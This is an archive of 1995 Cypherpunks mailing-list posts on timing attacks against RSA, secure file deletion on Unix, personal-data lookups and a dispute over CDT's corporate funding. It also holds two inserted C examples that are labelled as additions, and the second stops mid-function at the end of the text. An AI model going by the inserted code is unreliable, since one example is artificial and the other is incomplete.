Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <9512141637.AA11479@toad.com>
Message-ID: <m0tQKk7-0002e8C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "rick" == rick hoselton <hoz@univel.telescan.com> writes:

    rick> On another note, timing attacks would not seem to work
    rick> against most DES implementations, hardware or software.  The
    rick> time to execute each round does not seem to depend on the
    rick> plaintext or the key.  It could be made to, of course, but
    rick> unless I'm missing something, the "natural" way to code it,
    rick> or to construct hardware for it, is not time dependent.

Someone mentioned measuring power consumption instead of execution
time. I think the same statistics should apply in that case.

Of course this attack requires knowledge of the chip design, but that
should be possible to gain. It's certainly easier than reading
information from a protected EEPROM.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMNCQGEyjTSyISdw9AQEt6wP+LWttWh2i9S8G/zvjU0cM0Rcw4uA/JGRo
Qb0QrTfEZ6NI/oCWe4JTZCEQCgGZJ9ApoZMERHTGi4568dD3Cn3jZCkGVYfbeYxq
ShOij0DaxkrjaRTsRgmhHVainB1bv5JE3heXYYRgGTLIDkclGtayz8VON3Yr7Oop
mSBr/Fot5B4=
=YOEs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Fri, 15 Dec 1995 13:04:54 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE? (fwd)
Message-ID: <m0tQRM9-0005BvC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From toad.com!owner-cypherpunks Thu Dec 14 17:36:57 1995
> Date: Thu, 14 Dec 1995 14:50:19 -0800 (PST)
> From: Sandy Sandfort <sandfort@crl.com>

> 
> So far, no one has come up with anything stronger than specula-
> tion about my database question.  Some "anonymous" told me how
> easy it was to buy *phone numbers* on CD-ROMs.  Great, but I
> didn't give the guy my phone number.
> 

It was probably a shrewd guess on the part of the phone peon,
combined with a fresh database from the telephone company. Are 
there many people in your zip code with the same last name as
yourself? If not, that pretty much answers your question right
there.

When you pull a credit report from TRW's database, the only
information TRW needs is the first four (?) letters of the last
name, the initial of the first name, the numeric part of the
address, the first character of the street name, and the zip code.
I'll leave it to the experts in information theory to explain
that in rigorous technical detail.

Given only a last name and a zip code, I wouldn't be surprised
if you found the proper individual most of the time. (If you're in
Minnesota and you're looking for Swenson in 55419, you may need
more info, but not much.)

Another anecdote to add to the pile: I moved to a new apartment
last May. For various reasons, I got an unlisted number, and had
my credit card bills and magazine subscriptions sent to a mail
drop (MBE). The phone, gas, electric and cable bills went to the
new apartment, not to the mail drop.

I didn't get any junk mail at the new apartment until a couple
of weeks ago--right after I changed my subscription to Byte to
come here (now I'm getting AOL disks, etc.). Before that, I got
no junk mail here (except from the phone or cable company). I
get almost no telemarketing calls; I used to get at least one a
night with a listed phone number.

My experience appears to be that credit card and magazine companies
sell lists; utility and cable companies don't. Mass mailers must
not get unlisted number customers on the lists they get from the
phone company. Again, this is only from my experience, all disclaimers
apply.

And all this has no relevance whatsoever when you bring the 
government into the picture.

Crypto relevance? Well, I did mention information theory...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (The user formerly known as Leslie Todd Masco)
Date: Fri, 15 Dec 1995 12:38:59 +0800
To: cypherpunks@toad.com
Subject: [UNIX] Re: Secured RM ? (source)
Message-ID: <199512150325.WAA01214@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199512150218.VAA14539@homeport.org>,
Adam Shostack <adam@lighthouse.homeport.org> wrote:
>| 
>| While we're here..  I haven't been able to find anyone on the planet who's 
>| seen or heard of a linux un-remove, which makes testing my code very 
>| tricky. 
>	From comp.unix.questions FAQ:
>	(http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html)
  [Info about delete/undelete/expunge/purge del]

That's not very useful in this context: all it does is move files to
.#{oldname} and then later remove them.

I'd suggest that anybody interested in this topic under UNIX examine the
vnode structures and understand how the filesystem keeps file lists.  Many
vendor UNIces have fairly well commented header files.

{Only marginally cypherpunk-related, in the 'Security in the real world'
 category.}
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNDqmSoZzwIn1bdtAQGorwF+KsU/UZom/+C8ldvzKDPajDh6fiVtg1K1
kxTyLGyAjf5W+SNRM1f6kU5YdJlUmZxP
=yo70
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Fri, 15 Dec 1995 17:31:52 +0800
To: cypherpunks@toad.com
Subject: Re: Secured RM ? (source)
In-Reply-To: <199512150218.VAA14539@homeport.org>
Message-ID: <Pine.A32.3.91.951214222509.43804A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 14 Dec 1995, Adam Shostack wrote:

> 	From comp.unix.questions FAQ:
> 	(http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html)
> 
> 	MIT's Project Athena has produced a comprehensive
>       delete/undelete/expunge/purge package, which can serve as a
>       complete replacement for rm which allows file recovery.  This
>       package was posted to comp.sources.misc (volume 17, issue
>       023-026)

Well, thanks for trying..  The athena package isn't an undelete program, 
it's a replacement for rm that copies rm'd files into a trashcan directory 
which is expunged at regular intervals... *sigh*

Still looking..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sat, 16 Dec 1995 12:38:55 +0800
To: root <root@HellSpawn.gate.net>
Subject: Re: Secured RM ? (source)
In-Reply-To: <Pine.LNX.3.91.800121064335.1068A-100000@HellSpawn.gate.net>
Message-ID: <WAA10910.199512150328@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.LNX.3.91.800121064335.1068A-100000@HellSpawn.gate.net>, root writes:
>
>OK ... here we go.. Based on discussion on this list this is what I 
>hacked out to (hopefully) more securely remove a file under unix. 
>I'd really appreciate any input, but my main interest is in the security of 
>the protocol in general and not the sloppy and embarrassing C 
>programming.. :) 

Well it seems to assume that it only needs to write 1024 bytes past the
end of the file.  You either don't need to write any bytes at all past 
the end, or you need to write one "block" past the end (normally 8K,
but it varies), you can use fsstat(2) on many systems to find the block
size for a filesystem.

Secondly you need to flush the data out to the file (use fflush(3), and
fsync(2) if available, otherwise call sync(2) *twice*).  If you don't some
small set of Unix systems may notice that you are writing to a file that
no longer exists, and not do the writes at all.

Thirdly you should make several passes over the file, writing different
patterns on each pass (and remember the flush & sync after each pass -
while it is uncommon for Unix systems to suppress writes to unlinked files
it is extremely common for them to detect multiple writes to the same part
of a file, and only do the last one).

Fourth - and this is the kicker - there is no guarantee that the filesystem
itself won't keep a copy of the old data for some reason.  Three examples:

 * a compressed filesystem may write the new data elsewhere because it
 compresses differently from the old data - you should be able to defeat
 this by filling the disk several times with random patterns

 * the log structured filesystem (LFS) *will* write the new data elsewhere,
 and the space the old data is on will not be overwritten until the
 cleaner comes and examines the part of the disk it is on - again filling the
 disk several times with random patterns should cause an overwrite

 * NetApp's NFS appliance ("the toaster") can (and normally is) configured
 to take "snapshots" of the filesystem at various times, this makes the
 blocks the file is currently on read-only, and any overwrites will merely
 allocate new space.  The old copy of the file will be readable for some
 period of time (frequently up to a week) under a different name - here you
 will be unable to fill the disk (unless you are the NetApp admin - then
 you can delete the appropriate snapshots and fill the disk...)


While we are at it you probably want to use stat(2) to find the length
of the file, and you can get far more I/O if you allocate a sizeable
chunk of memory (say 1K, or 8K) and use writev(2) to shove multiple copies
of it out per syscall...    and some indenting on the code would make
it more readable (and simpler for you to write as well).

>While we're here..  I haven't been able to find anyone on the planet who's 
>seen or heard of a linux un-remove, which makes testing my code very 
>tricky.  If anyone can point me at it I'd appreciate it. Hell, if someone 
>can definitively say they've /seen/ such a thing it'd be nice. So far 
>I've found one person who insists that his system admin's sister's 
>boyfriend's cousin from Saint Petersburg has been using un-rm for unix for 
>years. *sigh* 

I don't know of a real un-rm.  In "the old days" there was a fsdb (filesystem
debugger) that could be used to alter the filesystem at a low level.  If
you knew enough you could "un-rm" a file.  (It had to be a very valuable
file to be worth it!)  At some sites they alias rm to do something like
"mv $1 .$1.deleted"; making an un-rm is left as an exercise for the
interested reader.
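
The procedure described in the message above, as an added C example that is
not part of the original post or of the code it reviews: length from fstat(2),
span rounded up to a whole block, a different pattern per pass pushed out with
writev(2), and fsync(2) after every pass. fstatvfs(3) is used here for the
block-size lookup, and scrub_file, overwrite_pass, demo_scrub and the /tmp
path are names assumed for the example.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/statvfs.h>
#include <sys/uio.h>
#include <unistd.h>

#define NIOV 8 /* copies of the pattern buffer handed to each writev(2) */

/* One pass: fill [0, span) with `pattern`, then force it out with fsync(2). */
static int overwrite_pass(int fd, off_t span, unsigned char pattern,
                          unsigned char *buf, size_t bufsz)
{
    struct iovec iov[NIOV];
    off_t left = span;

    memset(buf, pattern, bufsz);
    if (lseek(fd, 0, SEEK_SET) == (off_t)-1)
        return -1;
    while (left > 0) {
        off_t queued = 0;
        int n = 0;
        /* Every iovec entry points at the same buffer; only lengths differ. */
        for (; n < NIOV && queued < left; n++) {
            off_t rest = left - queued;
            iov[n].iov_base = buf;
            iov[n].iov_len = rest < (off_t)bufsz ? (size_t)rest : bufsz;
            queued += (off_t)iov[n].iov_len;
        }
        ssize_t done = writev(fd, iov, n);
        if (done < 0 && errno == EINTR)
            continue;
        if (done <= 0)
            return -1;
        left -= done; /* a short write just means another trip round */
    }
    return fsync(fd); /* per pass, so earlier patterns are not coalesced away */
}

/* Overwrite `path` once per pattern and optionally unlink it. Returns the bytes
 * covered per pass (length rounded up to a whole block), or -1 on error. */
long long scrub_file(const char *path, const unsigned char *patterns,
                     size_t npatterns, int remove_after)
{
    struct stat st;
    struct statvfs vfs;
    long long result = -1;
    int fd = open(path, O_WRONLY); /* never O_TRUNC: that frees the blocks */

    if (fd < 0)
        return -1;
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && fstatvfs(fd, &vfs) == 0) {
        size_t blk = vfs.f_frsize ? vfs.f_frsize : 8192; /* 8K fallback assumed */
        off_t span = (st.st_size + (off_t)blk - 1) / (off_t)blk * (off_t)blk;
        unsigned char *buf = malloc(blk);
        size_t i = 0;
        while (buf != NULL && i < npatterns &&
               overwrite_pass(fd, span, patterns[i], buf, blk) == 0)
            i++;
        if (buf != NULL && i == npatterns)
            result = (long long)span;
        free(buf);
    }
    if (close(fd) != 0 || (result >= 0 && remove_after && unlink(path) != 0))
        result = -1;
    return result;
}

/* Constructed self-check: scrub a 5000-byte temp file, then read it back. */
int demo_scrub(void)
{
    static const unsigned char patterns[] = { 0xFF, 0x00, 0xAA };
    char path[] = "/tmp/scrub_demo_XXXXXX", secret[5000];
    unsigned char byte;
    long long covered, seen = 0, bad = 0;
    int fd = mkstemp(path);

    memset(secret, 'S', sizeof secret);
    if (fd < 0 || write(fd, secret, sizeof secret) != (ssize_t)sizeof secret)
        return 1;
    close(fd);
    covered = scrub_file(path, patterns, sizeof patterns, 0);
    if ((fd = open(path, O_RDONLY)) < 0)
        return 2;
    for (; read(fd, &byte, 1) == 1; seen++)
        bad += (byte != 0xAA); /* only the last pattern should remain */
    close(fd);
    if (covered < 5000 || seen != covered || bad != 0)
        return 3;
    if (scrub_file(path, patterns, sizeof patterns, 1) != covered)
        return 4; /* this second call also unlinks the file */
    return access(path, F_OK) == 0 ? 5 : 0;
}

int main(void) { return demo_scrub(); }
```

The read-back in demo_scrub only sees what the filesystem returns through the
file itself; it cannot detect the stale copies on compressed, log-structured
or snapshotting filesystems that the message warns about.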




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Fri, 15 Dec 1995 15:19:17 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
Message-ID: <9512150734.AA0051@cnct-gw.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks (belatedly) for posting this, Russell.  Who was it said, "Follow the
money."  Great stuff.

For a good time, call the EFF about these folks.  For a better time, call
the ACLU.

It might be hilarious to make some inquiries around Stanford...  Maybe Rich 
Graves can give us the poop.

Best,  Clark

Probably time someone wrote an expose of industry and cryptocrats "hacking"
public policy groups.  Wonder where one could PLAGIARIZE such tidbits?  ;-)

(apologies -- "plagiarize" is an inside joke for the filterslugs ;-)


//--- forwarded letter ---------------------------------------
> MIME-Version: 1.0
> Date: Tue, 21 Nov 95 12:01:10 -0500
> From: JWRCLUM@aol.com
> To: cypherpunks@toad.com
> Subject: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy

>      The following article appeared in the current issue of
> Corporate Crime Reporter (Volume 9, Number 44, November 20, 1995,
> page one).  It is redisseminated on the Internet with the 
> permission of CCR.
> 
> SELF-PROCLAIMED "PUBLIC INTEREST" GROUP  HEAVILY FUNDED BY
> COMPUTER, TELECOMMUNICATIONS, DATABANK CORPORATIONS THAT WOULD
> BENEFIT FROM "MEDICAL PRIVACY" LEGISLATION GROUP SUPPORTS --
> EQUIFAX, TRW, DUNN & BRADSTREET IN THE MIX                                 
> 
>      The Center for Democracy & Technology (CDT), a self-
> proclaimed "public interest organization," is in fact heavily
> funded by large private computer, telecommunications, and
> databank corporations.
>      Funders of CDT, a two-year old Washington, D.C.-based
> advocacy organization, include Dunn & Bradstreet Corp., Equifax
> Inc., and TRW Information Services, three large databank
> corporations that stand to benefit from federal legislation CDT
> actively helped shape and is shepherding through Congress.
>      This year, CDT has received $699,643 from more than 30 large
> corporations, including $100,000 from Microsoft, $75,000 from
> AT&T, $60,000 from Bell Atlantic, $50,000 from Apple Computer,
> $25,000 from IBM, $10,000 from TRW Information Services, $10,000
> from Dunn & Bradstreet, $5,000 from Direct Marketing Association,
> and $5,000 from Equifax Inc. (For a complete list of CDT's
> funders, see At A Glance, page 16)
>      At a hearing before the Senate Labor and Human Resources
> Committee last week, CDT deputy director Janlori Goldman said
> that CDT "strongly supports" legislation, S. 1360, sponsored by
> Senators Robert Bennett (R-Utah) and Patrick Leahy (D-Vermont),
> because it represents "the most comprehensive and strong privacy
> bill the Congress has yet considered in this area."
>      But opponents of the bill argue that the legislation is not
> a privacy statute at all, but instead is a vehicle that would
> legitimize the creation of large computerized databanks of
> personal medical information, thus benefitting those companies
> like TRW and Equifax that give financial support to CDT. The
> legislation would allow for broad, unauthorized searches of those
> databanks, opponents claim.
>      In an interview, Goldman told Corporate Crime Reporter that
> all of CDT's corporate funding is earmarked for other projects
> and that none of the corporate funding is supporting her work on
> the medical privacy bill.
>      "The corporate funding is not related at all, in any way
> shape or form to my work on this bill," Goldman said. "The reason
> we are doing this bill is that I've worked on privacy issues for
> a decade. The most important privacy issue to work on is the
> passage of the medical records privacy legislation. That is a
> very sincere issue for me."
>      "None of the corporate support that CDT gets is related to
> my work on this bill," Goldman emphasized. "None. Zippo."
>      CDT's executive director, Jerry Berman agreed. "We have no
> funding for the medical privacy project -- zero," Berman said.
>      But critics of the CDT's position on the legislation were
> skeptical.
>      "During the Senate hearing this week, Senator Bennett was
> angered at the suggestion that S. 1360 was an industry bill,"
> said Jamie Love of Ralph Nader's Center for Study of Responsive
> Law. "He claimed that he had widely consulted with privacy groups
> and patient advocates. CDT's Janlori Goldman was the key person
> who decided who was in the loop, and who was not in the loop on
> this issue. Groups that were not receptive to the idea of massive
> database systems of personal medical records were excluded from
> deliberations."
>      "To find out that CDT has been funded by companies such as
> Equifax, TRW, Dunn & Bradstreet, IBM and the telephone companies
> is remarkable, because these are among the groups who have the
> most at stake in legitimizing and preserving the current system
> of maintaining and managing medical records," Love said. "I think
> that Janlori Goldman should have mentioned in her Senate
> testimony that CDT was funded by corporations who have an
> interest in this issue."
>      "If CDT were doing its job, TRW and Equifax wouldn't want to
> give it money," Love added.
>      Harold Eist, president-elect of the American Psychiatric
> Association, said that "any datagathering and large computer
> company would clearly benefit from legislation that drives large
> amounts of individually identified data about American citizens
> into data banks without the knowledge and permission of those
> American citizens." 
>      "Selling that information would represent a gold mine for
> those companies," Eist said.
>      "It is not surprising that an organization with a
> disingenuous name -- Center for Democracy & Technology -- would
> be supporting a bill with a disingenuous name -- The Medical
> Records Confidentiality Act," Eist said. "In fact, this bill
> represents an effort to give away the privacy of American
> citizens without their knowledge."
>      "My understanding is that Janlori Goldman was involved in
> writing the bill," Eist said. "It seems to me that as a former
> civil libertarian, she should know very well that there are
> loopholes in that bill regarding protections to privacy that you
> could drive a Mack truck through." 
>      "Unless people can be assured that their privacy will be
> protected, there is little or no chance that they will reveal the
> kind of tormented and dark secrets that they have to reveal to
> recover from their illnesses," Eist said. "Confidentiality is the
> sine qua non of medical treatment, and especially if it is
> psychiatric medical treatment."
>      A driving force behind the effort to derail the
> Bennett/Leahy bill is Denise Nagel, a Boston physician who
> organized the Coalition for Patient Rights of New England "to
> restore confidentiality to the doctor-patient relationship."
>      Nagel refused to comment on CDT's funding.
>      At the Senate hearing last week, Nagel told the committee "I
> have no industry ties."
>      Nagel charged that S. 1360 was written "to advance the
> interests of certain segments of the computer,
> telecommunications, data processing and health-care industries."
>      "With this bill they would be able to careen full speed
> ahead to develop data networks that will give innumerable people
> access to our medical records legally and without our knowledge,"
> Nagel said.
>      "I am convinced that S. 1360 is not at all primarily
> concerned with the confidentiality of medical records," Nagel
> told the committee. "It is just the opposite. It talks about
> informed consent, but then authorizes the creation of databases
> without patient knowledge or consent. It talks about individual
> rights, and then allows police broad authority to search
> databases directly instead of obtaining a specific record from
> the patient's doctor. It talks about civil and criminal
> sanctions, and then pre-empts all common law and most existing
> and future state statutes. It talks about ensuring personal
> privacy with respect to medical records, and then sets a ceiling
> rather than a floor on medical confidentiality."
> 
> AT A GLANCE: CENTER FOR DEMOCRACY AND TECHNOLOGY FUNDING, 1994-
> 1995
> 
> American Advertising Federation         500.00
> America Online, Inc.                 25,000.00
> Apple Computer Inc.                  50,000.00
> AT&T                                 75,000.00
> Bell Atlantic                        60,000.00
> Business Software Alliance            6,000.00
> Cellular Tellecomm Indust Assn       10,000.00
> CompuServ                            30,000.00
> Delphi Internet Services Corp        10,000.00
> Direct Marketing Association          5,000.00
> Dunn & Bradstreet Corp               10,000.00
> EMA                                   5,000.00
> Equifax Inc.                          5,000.00
> John Gilmore                          2,500.00
> Hartford Foundation                 153,000.00    
> IBM                                  25,000.00
> Information Technology Industry       5,000.00
> Interactive Digital Software          5,000.00
> Lotus                                 6,250.00
> MARC                                 80,000.00
> MCI Telecommunications               15,000.00
> Microsoft                           100,000.00
> National Cable Television Assn       15,000.00
> Netscape Communications Corp          5,000.00
> Newspaper Association of Am           5,000.00
> Nynex Government Affairs             25,000.00
> Pacific Telesis                      25,000.00
> Prodigy Service Company              10,000.00
> Software Publishers Assn             10,000.00
> Time Warner Inc                       5,000.00
> TRW Information Svcs                 10,000.00
> US Telephone Association             10,000.00
> US West Inc                          10,000.00
> 
> Total Funding                        814,020.00
> 
> Received 1994                        114,377.00
> Received 1995                        699,643.00
> 
> Total Funding                        814,020.00
> 
> 
> 
> Russell Mokhiber
> russell@essential.org
> voice: 202/429-6928
> 

[big birdie follows]

     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 16 Dec 1995 03:00:13 +0800
To: JWRCLUM@aol.com
Subject: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
In-Reply-To: <9512150734.AA0051@cnct-gw.new-york.net>
Message-ID: <Pine.ULT.3.91.951214232857.10286G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My friend Clark wrote:

>Thanks (belatedly) for posting this, Russell.  Who was it said, "Follow the
>money."

I believe that was Woodward & Bernstein. They were referring to some
right-wing wackos who had flagrantly broken the law investigating their
political opposition, then very sloppily tried to cover it up. Woodward &
Bernstein brought down a President. I think they're cool (though they seem
to have rested on their laurels, and their subsequent work is less
impressive). 

Anyway, Russell, did you ever get a followup to this? I don't see a
response on CDT's Web page, so I assume the funding issue never hit the 
"mainstream." I haven't been following the relevant lists and newsgroups.

While Leahy, the medical privacy bill's chief sponsor, is generally regarded 
as a White Hat (he led the opposition to Exon), I do have serious 
concerns about the issues that have been raised. I'm aware of the CDT's 
break with the EFF and have questioned their "maturity" before. It's 
possible they were "co-opted" or naive.

But at least the CDT cites its sources (like the full text of the bill and
testimony), and allows financial disclosure. This is not true of some less
reputable fringe organizations and publications. 

As for Clark's implied threats (I'm not entirely sure how much to read
into them, probably not much), I am of course aware of the vulnerability
of my personal records, and live my life accordingly. This includes
monitoring fraudulent requests for credit and medical records and being
completely honest with friends and employers. This is the "other" reason
I'm on cypherpunks. Would that we would all do the same. 

As for Clark knowing that I'm an274074@anon.penet.fi, well DUH. I've
posted that several times. It's advertised as a means for people
uninformed about remailers and such to send me anonymous tips. 

As Woody Allen once said, be fruitful and multiply.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNEtGo3DXUbM57SdAQEkGAP/d7pefEMU3gEMfjZnAz+vOhm4SmEbwVho
HlzGG8JKsie+3htqg3K04lZLse1RmcAgRoa71YaO0uaN6J0xmQA2Bd7f2Y/4kWwP
aetQsGtresxvTIq7tg+AZ6MNTADalVvojfKh2MeeVcEV3izMfZOqvd/9X77YMRdC
d4vBQwl1PuQ=
=ayJ1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Fri, 15 Dec 1995 21:43:12 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE? [getting noisy]
Message-ID: <m0tQU48-0005N0C@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:

[Sandfort summer picnic invitation list deleted]
> 
> 
>       This took about a minute using a shabby consumer-level DB.
>       *Now* do you get it?
> 
> 
> Hieronymous
> 

Well, "information wants to be free", and all that stuff...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 16 Dec 1995 00:29:40 +0800
To: jmb@FreeBSD.ORG
Subject: Re: kocher's timing attack
Message-ID: <199512151457.GAA27245@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: dreschs@austnsc.tandem.com (Sten Drescher)
> On Firewalls, "Jonathan M. Bresler" <jmb@FreeBSD.ORG> said:
> JMB> After
> JMB> several large key signing parties hundreds of known ciphertexts
> JMB> could have been generated using Alice's key--each one a public key
> JMB> of someone else.  over several years it piles up.  the known
> JMB> ciphertexts can be tested/analyzed to yield Alice's secret key.
> JMB> ouch.  ;/
> 
> 	Are you sure about this?  It would seem that the same principle
> would then apply to signed messages as well, and I find it a bit hard to
> believe that signing messages would make ones key pair vulnerable.

As Kocher's paper implies, the known ciphertext attack is a TIMING
attack.  Simply accumulating known text/signature pairs as you would have
after a "key signing party" does not help.  You must know exactly how
much time each signature took.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 15 Dec 1995 14:42:02 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512150601.HAA14657@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                           SANDY SANDFORT
      . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . "
wrote:



>C'punks,
>
>So far, no one has come up with anything stronger than speculation
>about my database question.  Some "anonymous" told me how
>easy it was to buy *phone numbers* on CD-ROMs.  Great, but I
>didn't give the guy my phone number.

      You don't get it, do you?



      This took about a minute using a shabby consumer-level DB.
      *Now* do you get it?


Hieronymous



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNEPY73g0mNE55u1AQGE7AH/VmrgEKI1cf3QoF3sR+tUqjOsbp/5OgOd
nFhuSPro8+W2wJIdNcQ8n4oyo1ecm6UCN90HUBycie5Xh5c4Zebc+A==
=WWU1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 16 Dec 1995 02:01:58 +0800
To: cypherpunks@toad.com
Subject: Re: Kocher's RSA attack
Message-ID: <199512151506.HAA27760@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Derek Atkins <warlord@MIT.EDU>
> I must disagree, software implementations of RSA can and probably do
> allow the timing attacks.  It all depends on the modexp implementation.
> Most implementations that I know of, when performing an x^y mod n will
> require a squarings and b multiplies, where a is the number of bits in
> y and b is the number of 1-bits in y.

This is not enough - Paul Kocher's attack depends on the individual
modular multiplies taking different times.  (Actually, that is for his
attack on Diffie Hellman.  The RSA CRT decryption attack uses a
completely different principle, but I guess we are ignoring that for
now.)  The fact that timing a modular exponentiation would give
information about the density of 1 bits in the exponent is not
particularly new or surprising, as has been mentioned here.  What is
new is that you can actually figure out the specific exponent value.
But that requires variable-timing modmult, not just variable-timing
modexp.

PGP is somewhat unique in having a multiplicity of modmult algorithms
which can be selected at compile time.  I am not sure which of these
might be variable time and which might be fixed.  The most likely place
for time variation IMO is in the modular reduction rather than the
multiply; the multiply is generally deterministic with no variation due
to data values (although as was pointed out here, on some processors a
hardware multiply instruction may take variable time depending on its
inputs).  Some modular reductions involve trial division to some extent
or other, with different numbers of iterations possible depending on
certain (maybe unusual) values.  However I believe at least one of the
PGP modular reductions consists of multiplying by the reciprocal of the
modulus, followed by a fixed shift, and this one should be constant time
on a machine which has constant-time multiplies and shifts.  (This is
just going from memory, I haven't looked at the algorithm in several
years.)

Hal
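
Added example, not from the post and not PGP's code: a C cost model of the
distinction drawn above between variable-time modexp and variable-time
modmult. Counted steps stand in for time (an assumption), moduli are kept
below 2^16, and every name in it is made up for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Cost model (an assumption of this example): counted steps stand in for time. */
struct cost { unsigned squarings, multiplies, reduce_steps; };

typedef uint32_t (*reduce_fn)(uint64_t x, uint32_t n, uint32_t mu, struct cost *c);

/* Data-dependent reduction: shift-and-subtract division of x < 2^32 by n.
 * A subtraction happens only when the partial remainder reaches n, so the
 * amount of work depends on the operand values. */
static uint32_t reduce_variable(uint64_t x, uint32_t n, uint32_t mu, struct cost *c)
{
    uint64_t r = 0;
    (void)mu; /* reciprocal not used by this method */
    for (int bit = 31; bit >= 0; bit--) {
        r = (r << 1) | ((x >> bit) & 1);
        if (r >= n) {
            r -= n;
            c->reduce_steps++;
        }
    }
    return (uint32_t)r;
}

/* Fixed-step reduction: multiply by the precomputed reciprocal mu = 2^32 / n,
 * shift by a fixed amount, then one masked (branch-free) correction. */
static uint32_t reduce_fixed(uint64_t x, uint32_t n, uint32_t mu, struct cost *c)
{
    uint64_t q = (x * mu) >> 32;                 /* estimate, at most 1 too small */
    uint64_t r = x - q * n;                      /* hence 0 <= r < 2n */
    uint64_t mask = (uint64_t)0 - (uint64_t)(r >= n);
    r -= (uint64_t)n & mask;
    c->reduce_steps += 3;                        /* same three steps for any input */
    return (uint32_t)r;
}

/* Left-to-right square-and-multiply; requires 2 <= n < 2^16. */
uint32_t modexp(uint32_t base, uint32_t exp, uint32_t n, reduce_fn reduce,
                struct cost *c)
{
    uint32_t mu = (uint32_t)(((uint64_t)1 << 32) / n);
    uint32_t acc = 1;
    int top = 31;

    base %= n;
    while (top > 0 && !((exp >> top) & 1))
        top--;
    for (int bit = top; bit >= 0; bit--) {
        acc = reduce((uint64_t)acc * acc, n, mu, c);
        c->squarings++;
        if ((exp >> bit) & 1) {
            acc = reduce((uint64_t)acc * base, n, mu, c);
            c->multiplies++;
        }
    }
    return acc;
}

/* Spread (max - min) of reduction steps over a constructed set of bases. */
unsigned step_spread(reduce_fn reduce, uint32_t exp, uint32_t n)
{
    static const uint32_t bases[] = { 2, 3, 300, 4097, 65000 }; /* constructed */
    unsigned lo = ~0u, hi = 0;

    for (size_t i = 0; i < sizeof bases / sizeof bases[0]; i++) {
        struct cost c = { 0, 0, 0 };
        modexp(bases[i], exp, n, reduce, &c);
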